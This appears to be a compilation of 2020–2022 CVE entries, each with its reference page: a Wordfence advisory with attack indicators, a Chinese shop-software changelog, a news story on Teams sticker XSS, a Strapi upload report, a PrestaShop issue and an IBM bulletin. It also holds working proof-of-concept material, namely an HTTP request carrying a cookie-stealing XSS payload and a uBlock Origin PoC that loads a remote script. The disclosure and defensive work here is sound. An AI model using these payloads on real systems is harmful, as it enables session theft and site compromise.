WordPress Kaswara Modern WPBakery Page Builder plugin versions 3.0.1 and below suffer from an arbitrary file upload vulnerability.

    Description: Arbitrary File Upload/Deletion and OtherAffected Plugin: Kaswara Modern WPBakery Page Builder AddonsPlugin Slug: kaswaraAffected Versions: <= 3.0.1CVE ID: CVE-2021-24284CVSS Score: 10.0 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:HFully Patched Version: NO AVAILABLE PATCH.The majority of the attacks we have seen are sending a POST request to /wp-admin/admin-ajax.php using the uploadFontIcon AJAX action found in the plugin to upload a file to the impacted website. Your logs may show the following query string on these events:/wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1We have observed 10,215 attacking IP addresses, with the vast majority of exploit attempts coming from these top ten IPs:- 217.160.48.108 with 1,591,765 exploit attempts blocked- 5.9.9.29 with 898,248 exploit attempts blocked- 2.58.149.35 with 390,815 exploit attempts blocked- 20.94.76.10 with 276,006 exploit attempts blocked- 20.206.76.37 with 212,766 exploit attempts blocked- 20.219.35.125 with 187,470 exploit attempts blocked- 20.223.152.221 with 102,658 exploit attempts blocked- 5.39.15.163 with 62,376 exploit attempts blocked- 194.87.84.195 with 32,890 exploit attempts blocked- 194.87.84.193 with 31,329 exploit attempts blockedtotal exploit attempts (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVBShv6GLdzPVD2tfx2nL3-mW1vWpFD4Ms7XyN7RflyV3kWF_V1-WJV7CgVwTW2HR3PZ2kBMBfW2t6xdk5Ml1S9W5bCZ525-mJqWW40tw862L5dGgW3Y11hW3lq3yLW7y3VmP4FS25GW5F4n688Q7Md-W7h1qvn5WjbzdDFPF5rn3yqW3GxZMh3tKpFmW97_3MJ3QxrZsW4G865d4YQk8NW4L97Qj65XkLvW4lVm1J6zK1PHN4PpGwFcdg7nW5KZv7G1P1n1wW2xsSjJ8lVXZJW6-vVB14dqX31W51ts4M1f3sHMN3WTKGV7R0VmW3BkkKd7HcTHcW3Mgljb1Lw63wW7_lfQF8d1jK9W2STHKk85KKhwW29fhqS6Z-kR3W7CZrhd3CR-ZvW3N9v9p8j3s_9W4dwzb85pW5-f3fY-1 )Indicators of CompromiseBased on our analysis of the attack data, a majority of attackers are attempting to upload a zip file named a57bze8931.zip. When attackers are successful at uploading the zip file, a single file named a57bze8931.php will be extracted into the /wp-content/uploads/kaswara/icons/ directory. The malicious file has an MD5 hash of d03c3095e33c7fe75acb8cddca230650. This file is an uploader under the control of the attacker. With this file, a malicious actor has the ability to continue uploading files to the compromised website.The indicators observed in these attacks also include signs of the NDSW trojan, which injects code into otherwise legitimate JavaScript files and redirects site visitors to malicious websites. The presence of  this string in your JavaScript files is a strong indication that your site has been infected with NDSW:;if(ndsw==Some additional filenames that attackers are attempting to upload includes:- [xxx]_young.zip where [xxx] varies and typically consists of 3 characters like ‘svv_young’- inject.zip- king_zip.zip- null.zip- plugin.zipWhat Should I Do If I Use This Plugin?All Wordfence users, including Free, Premium, Care, and Response, are protected from exploits targeting this vulnerability. However, at this time the plugin has been closed, and the developer has not been responsive regarding a patch. The best option is to fully remove the Kaswara Modern WPBakery Page Builder Addons plugin from your WordPress website.If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected, as this is a serious vulnerability that can lead to complete site takeover.If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

WordPress Kaswara Modern WPBakery Page Builder 3.0.1 File Upload

PrestaShop version 1.7.6.7 suffers from a cross site scripting vulnerability via the file upload functionality.

PrestaShop 1.7.6.7 Cross Site Scripting

Electronic mall system 1.0_build20200203 is affected vulnerable to SQL Injection.

**产品优势**

 多端展示

电脑/WAP/安卓/IOS/各平台小程序

 商家入驻

普通会员用户也可以发布商品/文章

 回收站

即使数据不小心误删，也可无忧找回

 快捷登录

支持QQ/微信等快捷登录，一键注册

 SEO优化

支持伪静态/sitemap/自定义关键词

**套餐选择 / Pricing**

多种套餐选择，即开即用

*   **标准版（598元/永久）**
    
    *   版权文字：自动去除
    *   随机广告：自动去除
    *   文章条数：无限制
    *   商品个数：无限制
    *   缺货提醒/快捷登录/回收站/免登录购买
    *   运行端：网站部分
    
    立即开通
*   **高级版（798元/永久）**
    
    *   版权文字：自动去除
    *   随机广告：自动去除
    *   文章条数：无限制
    *   商品个数：无限制
    *   缺货提醒/快捷登录/回收站/免登录购买
    *   运行端：网站+APP+小程序
    
    立即开通
*   **站群版（998元/永久）**
    
    *   版权文字：自动去除
    *   随机广告：自动去除
    *   文章条数：无限制
    *   商品个数：无限制
    *   缺货提醒/快捷登录/回收站/免登录购买
    *   运行端：网站+APP+小程序+站群
    
    立即开通

**模板库不断更新，模板尽情下载**

T1 - 电子商城模板（PC/WAP） 演示

T11 - 电子商城模板（PC） 演示

T5 - 资源下载模板（PC） 演示

T14 - 素材下载模板（PC） 演示

T15 - 游戏资源模板（PC/WAP） 演示

T16 - 知识付费模板（PC/WAP） 演示

T2 - 新闻门户模板（PC/WAP） 演示

T4 - 企业官网模板（PC/WAP） 演示

T3 - 个人博客模板（PC/WAP） 演示

更新日志

\[20220529\] 修复：修复了收银台无法正常收集订单信息的问题  
\[20220529\] 优化：优化了由于用户误删系统内置会员帐号导致系统无法正常运行的问题  
\[20220417\] 修复：修复了部分外部js导致页面加载慢的问题  
\[20220417\] 修复：修复了在已登录状态下点击注册按钮页面报错的问题  
\[20220417\] 修复：修复了部分主机环境下不支持下载中文文件名的问题  
\[20220417\] 优化：优化了程序，防止用户误删文件夹导致后台登录卡顿  
\[20220417\] 优化：后台直接上传图片可以按照日期归类  
\[20220417\] 修复：修复了文章模块采集微信公众号文章内容无效的问题  
\[20220413\] 修复：修复了会员中心充值界面虎皮椒接口错误的问题  
\[20220322\] 修复：修复了一处XSS漏洞  
\[20220223\] 修复：修复了会员免费下载次数不自动更新的问题  
\[20220223\] 修复：修复了使用手机支付文章后，电脑端网页不自动跳转的问题  
\[20220223\] 优化：对留言板功能进行了优化，防止用户插入代码  
\[20220209\] 修复：修复了站群版部分域名无法使用微信支付的问题  
\[20220209\] 修复：修复了后台登录时邮箱验证码不填写也可登录的问题  
\[20220118\] 修复：修复了后台自定义设置无法保存的问题  
\[20220107\] 优化：优化了实物商品购买后的界面显示  
\[20220107\] 修复：后台页面修复了部分css和js无法正常加载的问题  
\[20211225\] 修复：修复了收银台使用IOS系统进行支付宝支付时无法正常打开的问题  
\[20211225\] 新增：增加了商品，文章，订单导出EXCEL的功能  
\[20211225\] 修复：修复了手机端无法正常使用QQ登录的问题  
\[20211120\] 优化：优化虎皮椒支付接口对微信手机端支付流程  
\[20211120\] 新增：在线课程模块新增笔记功能  
\[20211120\] 优化：分站功能的商户平台新增支持绑定多个域名，使用分号隔开  
\[20211120\] 修复：修复了商品名称有特殊字符时，无法正常付款的问题  
\[20211120\] 修复：后台短信平台进行了迁移，用户需联系客服获取新的ID  
\[20211120\] 修复：修复了APP端和小程序端部分课程无法正常显示介绍的问题  
\[20211120\] 优化：新增了显示或关闭地图的功能  
\[20211120\] 修复：修复了开启缓存后无法正常购买的问题  
\[20211015\] 修复：修复了视频播放器无法判断部分不规则格式视频的问题  
\[20211015\] 修复：修复了后台驳回提现时重复点击导致多次退款的问题  
\[20211015\] 新增：支付接口新增了PAYPAL的个人收款接口  
\[20211015\] 新增：新增了限制用户免费下载次数的功能，普通、VIP、SVIP会员可分别设置  
\[20211015\] 修复：修复了使用虎皮椒充值时不跳转会员中心的问题  
\[20211015\] 优化：优化会员中心顶部按钮逻辑，可以更快直到明细列表  
\[20211015\] 优化：前台后台的资金明细和积分明细分开显示，更加清晰明了  
\[20211015\] 新增：后台新增统计会员余额和积分总和的功能  
\[20211015\] 新增：新增了批量操作会员的功能，包括增加余额、积分、删除、停用等功能  
\[20210928\] 修复：修复了后台卡密列表在会员不对应时报错的问题  
\[20210928\] 优化：针对未正确配置邮箱接口无法登录后台的问题进行了优化  
\[20210810\] 修复：修复了部分情况下会员中心充值界面不显示充值卡框的问题  
\[20210810\] 新增：邀请VIP开通增加了三级分销功能，与商品分销共用分成比例  
\[20210810\] 新增：虚拟评价功能增加了仅增加销量，不增加评价的功能  
\[20210810\] 新增：商品模块增加了仅限永久VIP购买的选项  
\[20210810\] 修复：修复了会员中心登录注册界面不居中的问题  
\[20210810\] 修复：修复了后台登录时部分错误提示未正确显示的问题  
\[20210810\] 修复：修复了在IE内核浏览器下计算验证码无法正常使用的问题  
\[20210810\] 修复：修复了使用微信内置浏览器充值时资金错误的问题  
\[20210810\] 优化：卡密分类列表可以直接显示ID，方便填写发货内容时查看  
\[20210810\] 优化：卡密分类列表增加了隐藏按钮的功能，防止小屏显示器遮挡信息  
\[20210709\] 修复：修复了卖家中心订单列表重复显示的问题  
\[20210709\] 新增：卡密分类增加了二级分类，排序功能，分类折叠功能  
\[20210709\] 新增：新增了虎皮椒的支付宝接口  
\[20210709\] 新增：新增了支付宝商户新版支付接口，逐步淘汰旧版支付接口  
\[20210709\] 优化：为防止当面付的密钥填写错误，程序增加了字符数的验证  
\[20210709\] 新增：手机端模板也增加了自定义设置的功能  
\[20210709\] 新增：商品模块新增商品浏览量字段，可以在后台手动设置浏览量  
\[20210701\] 修复：修复了带参数后缀的视频地址无法正常播放的问题  
\[20210701\] 优化：优化了收银台界面，防止用户使用余额支付时不小心多次扣款  
\[20210624\] 新增：新闻模块新增了免登录购买的开关  
\[20210624\] 优化：优化了后台菜单栏的布局  
\[20210607\] 新增：支付接口新增了易支付平台的支付方式  
\[20210607\] 新增：商品模块新增限时特惠的功能（需配合模板更新）  
\[20210607\] 新增：课程播放新增对m3u8格式的支持  
\[20210517\] 新增：小程序端和APP端文章/课程/商品介绍内容新增了文字长按复制功能  
\[20210517\] 新增：小程序端新增了余额支付和网页支付的选项  
\[20210517\] 新增：优化了PAYJS支付接口在手机浏览器的支付体验  
\[20210517\] 新增：新增了一键清理虚拟评价的功能  
\[20210517\] 新增：订单新增了已退款的状态  
\[20210517\] 优化：优化了会员中心导航，方便会员回到网站首页  
\[20210517\] 优化：优化了后台文章和产品列表页，增加可显示编辑发布日期，可按日期排序  
\[20210517\] 优化：优化了会员中心充值界面，新增了几种支付方式  
\[20210517\] 新增：后台订单管理新增了备注功能和修改订单状态的功能  
\[20210430\] 新增：会员表和订单表新增了导出为excel的功能  
\[20210430\] 新增：订单新增了获取用户省份城市和客户端的功能，方便商家收集信息  
\[20210430\] 新增：发货页增加了备注功能，可以引导用户如何使用产品  
\[20210430\] 新增：购物页增加了对手机号码格式的验证  
\[20210430\] 新增：新增了采集其他发货100网站数据的功能  
\[20210430\] 新增：增加了批量新增会员帐号的的功能  
\[20210430\] 新增：支付方式加入极支付/虎皮椒支付，可使用个人收款码收款  
\[20210409\] 修复：修复了会员中心找回密码页面验证码错误的问题  
\[20210409\] 优化：因滑动块验证经常加载不出，将验证改为数字算式  
\[20210409\] 修复：修复了有大量文字的发货内容时订单错误的问题  
\[20210308\] 修复：修复了已知的SQL和XSS漏洞  
\[20210308\] 优化：对于有大量文字的发货内容，改为下载文档的方式  
\[20210308\] 新增：新增商户可以发布在线课程的功能  
\[20210301\] 新增：手机版会员中心底部和手机端模板底部加入了tabbar导航  
\[20210301\] 新增：菜单模块加入了菜单图标的功能，可以在部分模板上使用  
\[20210301\] 新增：后台文章和产品加入了按照店铺名称和商家名称搜索的功能  
\[20210222\] 新增：文章模块新增了仅限VIP购买的功能，可以一键开启或关闭  
\[20210125\] 新增：文章分类和商品分类新增了图标功能，可在移动端显示的更美观  
\[20210125\] 优化：模板设计增加了通用顶部和通用底部页面，方便加入外部代码  
\[20210125\] 优化：后台文章和商品新增了排序功能，方便管理  
\[20210104\] 新增：商品模块新增了兑换码取货的功能  
\[20201207\] 新增：后台会员管理界面新增了会员注册时间、商户开通时间、VIP开通时间等信息  
\[20201207\] 新增：加入了防恶意购买功能，可以设置时间间隔  
\[20201207\] 新增：新增网站缓存功能，可以提高网站加载速度  
\[20201207\] 新增：为有时限的订单加入了到期天数显示及到期邮件/短信提醒  
\[20201207\] 修复：修复了码支付自动加金额后回调失败的问题  
\[20201207\] 新增：加入了APP端独立的QQ快捷登录和微信快捷登录的开关  
\[20201207\] 新增：后台菜单管理新增了隐藏菜单的设置  
\[20201207\] 新增：微信小程序增加了分享到朋友圈的功能，需重新生成  
\[20201130\] 新增：后台新增了积分获取设置和积分兑换设置  
\[20201130\] 新增：新增了每日签到得积分功能  
\[20201130\] 新增：新增商品规格时支持上传规格图片  
\[20201130\] 优化：前台搜索页面增加了分页功能，防止卡顿  
\[20201124\] 新增：商品模块、文章模块、课程模块增加了开关按钮  
\[20201124\] 优化：后台回收站增加了分页功能防止单页加载过多内容造成卡顿  
\[20201124\] 修复：修复了在开启https后无法正常生成APP源码包的问题  
\[20201117\] 新增：课程模块除MP4视频之外，增加了对MP3音频和TXT文档的支持  
\[20201117\] 新增：商品规格加入了乘价的功能，方便价格翻倍时设置  
\[20201117\] 修复：修复了部分版本的当面付在未支付的情况下自动发货的问题  
\[20201117\] 优化：邮件发送功能增加了时间限制，防止滥用被限制  
\[20201117\] 新增：小程序及APP增加了相应的课程模板  
\[20201102\] 新增：新增了在线视频课程模块，支持分节购买和全套购买  
\[20201102\] 优化：微信支付/QQ钱包/PAYJS隐藏了支付时订单标题，防止拦截  
\[20201102\] 优化：留言新增了邮件提醒和后台的红点提醒  
\[20201102\] 优化：更新了码支付网关，解决了微信内支付被拦截的问题  
\[20201102\] 新增：会员注册功能新增了必填项功能，可以选择一项或多项必填  
\[20201026\] 新增：新增了商品和文章阅读的浏览历史功能  
\[20201026\] 新增：主站可以选择只展示主站或展示全部（主站+分站）内容  
\[20201019\] 新增：后台新增了在线编辑模板功能  
\[20201019\] 优化：小程序及APP新增加入了多规格购买功能  
\[20201010\] 优化：对SQL语句进行了优化，代码进行了精简  
\[20201010\] 新增：发货页面支持将发货内容生成二维码图片，方便保存  
\[20200921\] 新增：商品模块新增商品规格功能，并且可以设置各项独立发货内容  
\[20200921\] 修复：修复了对部分特殊命名的文件上传失败的问题  
\[20200921\] 修复：修复了一个文件任意读取漏洞\[高危\]  
\[20200914\] 优化：商品模块接入进货价功能，方便站长统计销售及利润  
\[20200914\] 优化：后台模板管理页面增加了代码运行允许时长，防止网速慢造成下载失败  
\[20200907\] 优化：商户中心卡密分类页加入显示库存及补货按钮  
\[20200907\] 优化：商户中心卡密列表页支持显示已发放/未发放功能  
\[20200907\] 新增：免费版后台首页加入广告区及购买授权优惠信息  
\[20200831\] 新增：新增支持子管理员修改自己的密码和头像  
\[20200824\] 优化：管理员驳回用户提现时可以通过邮件通知到用户  
\[20200824\] 修复：修复了使用微信支付/PAYJS的JSAPI接口下，收货信息无法正确写入的问题  
\[20200824\] 修复：修复了后台的几个文案错误  
\[20200824\] 新增：虚拟商品发货功能增加支持上传附件，可以直接发货附件  
\[20200810\] 新增：余额提现功能增加了驳回功能，同时可设置回复信息  
\[20200803\] 优化：订单查询功能增加了对mysql5.7及以上版本的支持  
\[20200803\] 优化：优化了获取客户端IP地址的方式，可以获取到真实IP  
\[20200803\] 新增：支付方式加入QQ钱包支付方式  
\[20200803\] 优化：对字节跳动小程序支付功能进行了完善  
\[20200803\] 优化：对订单金额进行了校验，保留两位小小数，防止金额小数过多导致支付失败  
\[20200727\] 优化：优化了后台顶部的提醒功能  
\[20200727\] 新增：后台订单管理加入了查询功能，支持通过订单标题/会员名查询  
\[20200727\] 修复：修复了子目录安装程序时，管理员权限设置无效的问题  
\[20200727\] 新增：为会员开通VIP的费用增加了分销佣金的提成  
\[20200727\] 修复：修复了会员中心分站焦点图无法删除的问题  
\[20200713\] 优化：增加了对订单的金额和数量加强了验证，防止出现负数  
\[20200713\] 新增：站群版分站支持仅展示自己店铺商品（需配合更新模板）  
\[20200713\] 新增：新增站群版分站开通VIP会员提成  
\[20200713\] 新增：站群版分站支持设置和主站不同模板  
\[20200713\] 新增：管理员支持设置模块权限，方便设置子管理员  
\[20200713\] 新增：为入驻商家加入了店铺页面（需配合更新模板）  
\[20200713\] 新增：实物商品发货可以设置收件信息开关，收件人，手机，地址可开启部分或全部  
\[20200713\] 新增：新增了百度站长平台页面推送功能，可以加速页面收录

CVE-2022-30113: 虚拟商品自动发货系统/付费阅读系统 - 发货100

The friendly image sent by your colleague on a teleconference may be hiding a malicious secret

The friendly image sent by your colleague on a teleconference may be hiding a malicious secret

A security researcher has found that attackers could abuse the popular sticker feature in Microsoft Teams to conduct cross-site scripting (XSS) attacks.

Microsoft Teams, alongside comparable teleconferencing services including Zoom, have experienced a surge in popularity over the past few years.

The Covid-19 pandemic forced organizations to adopt work-from-home models whenever possible. In the aftermath, employees have often been given the option of either staying remote or going hybrid.

With so many users, any vulnerability in Microsoft Teams could have widespread impact. As such, cybersecurity researchers, including Gais Cyber Security’s senior cybersecurity specialist Numan Turle, have examined the software for potential flaws.

**Sticky subject**

In 2021, Turle uncovered CVE-2021-24114. Issued a CVSS score of 5.7, the bug was discovered in the preview process of images sent via Teams to leak Skype tokens (PDF) and trigger an account takeover vulnerability in Teams iOS.

A year on, the researcher decided to examine Microsoft Teams’ sticker function for new security issues.

**RELATED** Vulnerability in Microsoft Teams granted attackers access to emails, messages, and personal files

When a sticker is sent via Teams, the platform converts it into an image and uploads the content as ‘RichText/HTML’ in the subsequent message.

Turle inspected the HTML request using Burp Suite and tried out typical attributes – to no avail, due to the protections offered by Microsoft’s Content Security Policy (CSP).

CSP is designed to mitigate a range of common web attacks, including XSS.

However, after plugging the CSP into Google’s CSP Evaluator tool, the researcher found a CSP defect – the field was flagged as unsafe, which paved the way for potential HTML injection attacks against multiple domains.

**Trying a different angle**

Microsoft had plugged these security holes via Azure domain changes. So, after digging deeper and inspecting Teams in-browser, Turle uncovered a JavaScript element, , that could be used as an alternative.

jQuery with Angular is a JavaScript framework for managing HTML and CSS interactions. However, this version was out of date and vulnerabilities in the outdated version (1.5.14) – could be utilized to bypass the CSP.

Read more of the latest security vulnerability news

After crafting a malicious iframe with help from HTML encoding, the researcher was able to create a malicious payload, sent via the stickers function in Teams, to trigger XSS, obtained through user interaction.

Turle disclosed the XSS issue to Microsoft on January 6. The vulnerability was patched in March and the researcher was awarded a $6,000 bug bounty.

_The Daily Swig_ has reached out to Gais Cyber Security and Microsoft and we will update when we hear back.

Full details can be found in a technical blog post from Turle.

**INTERVIEW** Vivaldi browser founder Jon von Tetzchner puts privacy at the center of development

Microsoft Teams security vulnerability left users open to XSS via flawed stickers feature

A vulnerability classified as problematic was found in SourceCodester Simple e-Learning System 1.0. Affected by this vulnerability is an unknown functionality of the file /vcs/claire_blake. The manipulation of the argument Bio with the input "><script>alert(document.cookie)</script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

An attacker could steal cookies with a crafted URL sent to the victims.

    POST /vcs/claire_blake HTTP/1.1
    Host: localhost
    Content-Length: 143
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/vcs/claire_blake
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: PHPSESSID=2vbf8fv8l1iaabtd45grgqt809
    Connection: close
    
    firstName=Claire&lastName=Blake&phoneNumber=2147483647&bio=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&profile-updateBtn=Update

CVE-2022-2396: CVE/POC.md at 83c243538386cd0761025f85eb747eab7cae5c21 · CyberThoth/CVE

An unrestricted file upload vulnerability in the Add New Assets function of Strapi v4.1.12 allows attackers to execute arbitrary code via a crafted file.

**Strapi v4.1.12****Vulnerability Explanation:**

An unrestricted file upload vulnerability in the Add New Assets function of Strapi v4.1.12 allows attackers to execute arbitrary code via a crafted file

**Attack Vectors:**

*   After uploading a file containing malicious content, when the user opens the link to the file, it will execute.

**Payload :**

https://github.com/bypazs/GrimTheRipper/blob/main/GrimTheRipperTeam.pdf

**Tested on:**

1.  Strapi Version 4.1.12
2.  Google Chrome Version 102.0.5005.61 (Official Build) (64-bit)

**Affected Component:**

*   On the Media Library page, it is allowed to upload files containing malicious content to the system.

**Steps to attack:**

1.  Log in with a user that has permission to upload files.
2.  Click on the "Media Library" menu, then click on "+ Add new assets".
3.  Click on the "Browse files: button, and then select the prepared file containing malicious content.
4.  Then click on the "Upload 1 asset to the library" button to upload the file to the system.
5.  Click edit in the corner of the file and click copy link.
6.  Paste the link to a new tab, it will show that the payload XSS was executed.

**Discoverer:**

 Grim The Ripper Team by SOSECURE Thailand

**Medium:**

*   https://grimthereaperteam.medium.com/strapi-v4-1-12-unrestricted-file-upload-b993bfd07e4e

**Disclosure Timeline:**

*   2022–05–29: Vulnerability discovered.
*   2022–05–29: Vulnerability reported to the MITRE corporation.
*   2022–07–14: CVE has been reserved.
*   2022–05–29: Public disclosure of the vulnerability.

Reference:

1.  https://github.com/strapi/strapi
2.  https://strapi.io/
3.  https://github.com/bypazs/strapi
4.  https://grimthereaperteam.medium.com/strapi-v4-1-12-unrestricted-file-upload-b993bfd07e4e

CVE-2022-32114: GitHub - bypazs/CVE-2022-32114: An unrestricted file upload vulnerability in the Add New Assets function of Strapi v4.1.12 allows attackers to execute arbitrary code via a crafted file.

Cross Site Scripting (XSS) vulnerability in uBlock Origin extension before 1.41.1 allows remote attackers to run arbitrary code via a spoofed 'MessageSender.url' to the browser renderer process.

**Description**

Email received at ubo-security at raymondhill.net on 2022-02-17:

> Hi,
> 
> I'd like to report a security vulnerability in the uBlock Origin extension.
> 
> A compromised renderer process of Chrome is able to spoof the URL of a messaging port and send privileged messages.
> 
> A compromised renderer process can spoof the 'MessageSender.url' in a chrome.runtime.onConnect listener\[1\]\[2\]. 'vAPI.messaging.onPortConnect' uses 'sender.url' to determine whether the port is privileged (https://github.com/gorhill/uBlock/blob/3154ed1bac227e4bc683c919d8d10bd01c9f8bb6/platform/common/vapi-background.js#L857-L861). As a result, a compromised renderer can spoof the URL to an extension URL and perform sensitive actions.
> 
> For instance, it can set 'userResourcesLocation' and add a custom filter to perform XSS.
> 
> \[1\] https://chromium.googlesource.com/chromium/src/+/refs/heads/main/docs/security/compromised-renderers.md  
> \[2\] https://developer.chrome.com/docs/extensions/mv3/security/#content\_scripts
> 
> *   Affected browser versions  
>     All Chrome including 98 (stable) to 101
>     
> *   PoC
>     
> 
> 1.  To simulate a compromised renderer, the following patch can be applied to Chromium:
> 
> diff --git a/extensions/renderer/ipc\_message\_sender.cc b/extensions/renderer/ipc\_message\_sender.cc
> index 5e25676cbcb..5e7436c28d6 100644
> \--- a/extensions/renderer/ipc\_message\_sender.cc
> +++ b/extensions/renderer/ipc\_message\_sender.cc
> @@ -154,6 +154,9 @@ class MainThreadIPCMessageSender : public IPCMessageSender {
>          }
>          info.target\_id = \*target.extension\_id;
>          info.source\_url = script\_context->url();
> +        if (info.source\_url.host() == "example.com") {
> +          info.source\_url = GURL("chrome-extension://cjpalhdlnbpafiamejdnhcphjbkeiagm/");
> +        }
>  
>          TRACE\_RENDERER\_EXTENSION\_EVENT(
>              "MainThreadIPCMessageSender::SendOpenMessageChannel/extension",
> 
> or the following patch to the uBlock Origin extension:
> 
> diff --git a/platform/common/vapi-background.js b/platform/common/vapi-background.js
> index 0d3cc584e..90e7c7089 100644
> \--- a/platform/common/vapi-background.js
> +++ b/platform/common/vapi-background.js
> @@ -855,7 +855,11 @@ vAPI.messaging = {
>          );
>          const portDetails = { port };
>          const sender = port.sender;
> \-        const { tab, url } = sender;
> +        const { tab } = sender;
> +        let { url } = sender;
> +        if (url.indexOf("example.com") !== -1) {
> +            url = "chrome-extension://cjpalhdlnbpafiamejdnhcphjbkeiagm/";
> +        }
>          portDetails.frameId = sender.frameId;
>          portDetails.frameURL = url;
>          portDetails.privileged = url.startsWith(this.PRIVILEGED\_URL);
> 
> 2.  Install uBlock Origin extension (https://chrome.google.com/webstore/detail/ublock-origin/cjpalhdlnbpafiamejdnhcphjbkeiagm).
> 3.  Visit https://example.com and open DevTools.
> 4.  To simulate a compromised renderer, change the JavaScript context to uBlock Origin and run 'await vAPI.messaging.send("dashboard", {what: "writeHiddenSettings", content: "userResourcesLocation https://gist.githubusercontent.com/ylemkimon/c722fc2dc8510734a169d272aa116a6a/raw/1b04a075104aa27dbcaae13bd7e0ba0ef0f633ab/xss.js"}); await vAPI.messaging.send("dashboard", {what: "createUserFilter", filters: "google.com##+js(xss.js)"});'.
> 5.  Visit https://google.com and observe that an alert with the 'document.domain' is shown.
> 
> *   Proposed fix  
>     Use 'MessageSender.origin' (https://developer.chrome.com/docs/extensions/reference/runtime/#property-MessageSender-origin) if available (Chrome 80+), which is not spoofable\[1\].
> 
> Best regards,  
> Young Min Kim
> 
> ——  
> Young Min Kim  
> CompSec Lab, Seoul National University

**uBlock Origin version**

1.40.2

**Browser name and version**

All Chrome including 98 (stable) to 101

**Operating System and version**

Irrelevant

CVE-2022-32308: Use unspoofable Messenger.origin to determine privilege level of ports · Issue #1992 · uBlockOrigin/uBlock-issues

File upload vulnerability in the Catalog feature in Prestashop 1.7.6.7 allows remote attackers to run arbitrary code via the add new file page.

Hi,

This is something we already received on the Bug Bounty program.  
Unfortunately, this is not a security issue, as we allow to upload any files we wanted, (it's the same for SVG files), any users with admin employee can upload this kind of file, like he's able to upload a module or a theme with comprised data.

Kind regards

CVE-2020-21967: Cross Site Scripting Issue in PrestaShop Using File Upload Functionality · Issue #20306 · PrestaShop/PrestaShop

IBM i 7.2, 7.3, 7.4, and 7.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 230516.

**Security Bulletin**

  

**Summary**

Digital Certificate Manager for IBM i is vulnerable to a cross-site scripting issue in the old web application as described in the vulnerability details section. IBM i has addressed the applicable CVE with a fix to the Digital Certificate Manage web application as described in the remediation/fixes section.

**Vulnerability Details**

**CVEID:**   CVE-2022-34358  
**DESCRIPTION:**   IBM i is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/230516 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM i

7.5

IBM i

7.4

IBM i

7.3

IBM i

7.2

  

**Remediation/Fixes**

The issue can be fixed by applying a PTF to IBM i.  IBM i releases 7.5, 7.4, 7.3, and 7.2 will be fixed.

The IBM i PTF numbers contain the fix for the vulnerability.

https://www.ibm.com/support/fixcentral

**_Important note:_** _IBM recommends that all users running unsupported versions of affected products upgrade to supported and fixed version of affected products._

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

Penetration tester working with Banque Nationale Du Canada

**Change History**

12 Jul 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

